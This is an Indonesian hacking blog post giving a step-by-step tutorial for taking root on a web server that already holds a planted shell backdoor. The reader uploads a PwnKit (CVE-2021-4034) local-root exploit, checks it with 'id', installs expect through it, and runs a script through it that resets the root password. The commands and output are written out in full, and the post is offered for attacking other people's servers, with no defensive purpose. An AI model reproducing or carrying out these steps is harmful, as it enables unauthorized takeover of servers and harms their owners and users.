Pagi Sobat IT.
Kembali Lagi Dengan Admin AoiCyber Yang Ganteng wkwk.
Kali Ini AoiCyber Akan Berikan Sebuah Trik Untuk Membypass Rooting Server Yang Tidak Bisa Di Backconnect Reverse Shell, dan Disini Saya Juga Sudah Mencoba Menggunakan Weevely Namun Tetep Saja Gagal.
Biar Ga Kelamaan Langsung Saja Kita Siapkan Bahan" nya :
1.Web Yang Sudah ditanam Shell Backdoor .
NOTE : Saya Sarankan Menggunakan Shell CMD
2.LocalRoot.
3.Script Bash Untuk Change Password Root:
4.Akses Internet.
Sepertinya Bahan" diatas sudah cukup ,Namun Ada Satu Syarat Lagi agar Trik Ini Bisa Bekerja Dengan Sempurna ,Yaitu Tidak Ada Disable Function / Disable Function : NONE.
Saya anggap disini kalian sudah menyiapkan bahan" diatas.
Jika Sudah, Ikuti Step Step Berikut.
A. Upload LocalRoot Ke Server.
B. Upload Shell Cmd Berikut : HERE.
Lalu Kalian Akses Shell Cmd Yang Barusan Kalian Upload ,Contoh :
https://vulnweb.com/cmd.php
Maka Akan Muncul Tampilan Seperti Ini :
Berhubung Web Yang Saya Coba Rentan Terhadap Exploit CVE 2021-4034 ( pkexec / PwnKit )
Maka Saya Upload LocalRoot Yang Cocok Terhadap CVE Tersebut .
Caranya Kalian Bisa Menggunakan Wget / Mengupload LocalRoot Yang Sudah Di Compile secara Manual ,Fungsinya Agar Kalian Tidak Perlu Meng Compile Localroot Tersebut .
Next Kalian Cek Dulu Apakah Server Benar" Rentan Terhadap Exploit Tersebut, Caranya Kalian Ketikan Command Berikut Pada :
Contoh Disini Saya rename nama localrootnya menjadi "localroot"
Maka Kalian Ketikan Command :
$chmod 0777 localroot
$./localroot 'id'
Bisa Kalian Lihat Ketika Saya Execute Localroot + Saya Cek id saya ,Dan Ternyata Benar" Vuln / Bisa Di Root.
Lanjut ,Kita Upload Bahan Yang Nomor 3, Yaitu Script Bash Untuk Mengganti Password User Root.
Jika Kalian Sudah Upload Script Bash diatas ,Kalian Harus Install expect Terlebih Dahulu ,Caranya Kalian Ketikan Command Berikut :
$./localroot 'yum -y install expect'
Jika Tidak Bisa Menggunakan yum Kalian Bisa Gunakan Command ini :
$./localroot 'apt-get install -y expect'
Dua"nya Tidak Bisa Digunakan? Jangan Nyerah dulu wkwk, cari referensi" yang lain.
Next Kalian Tinggal Execute Scriptnya Seperti Ini :
Contoh Nama Script Bash Tadi adalah pass.sh Dan Nama Localrootnya Adalah localroot ,Maka Kalian Ketikkan Command Dibawah Ini :
$./localroot 'bash pass.sh user yourpassword'
Untuk user Kalian Set Saja Menjadi User root dan yourpassword kalian ganti dengan password yang kalian inginkan, Maka Jadinya Akan Seperti ini :
$./localroot 'bash pass.sh root passw0rd'
spawn passwd root
Changing password for user root.
New password:
Retype new password:
passwd: all authentication tokens updated successfully.
Yaps Password Untuk User root Telah Berhasil Diubah:)
Jika Dari Kalian Ada Yang Belum Paham / Malah Ga Paham Sama sekali Kalian Bisa Tanyakan Langsung Melalui Kolom Komentar Dibawah.
Kalau Kalian Mau Request Tutor" Yang Lain Kalian Tinggal Comment dibawah.
Sepertinya cukup Sekian Dari AoiCyber Dan terima Kasih telah Berkunjung:)
SPECIAL THANKS TO :
UnKnownSec ~ RizkyFamz ~ Mr.Grim.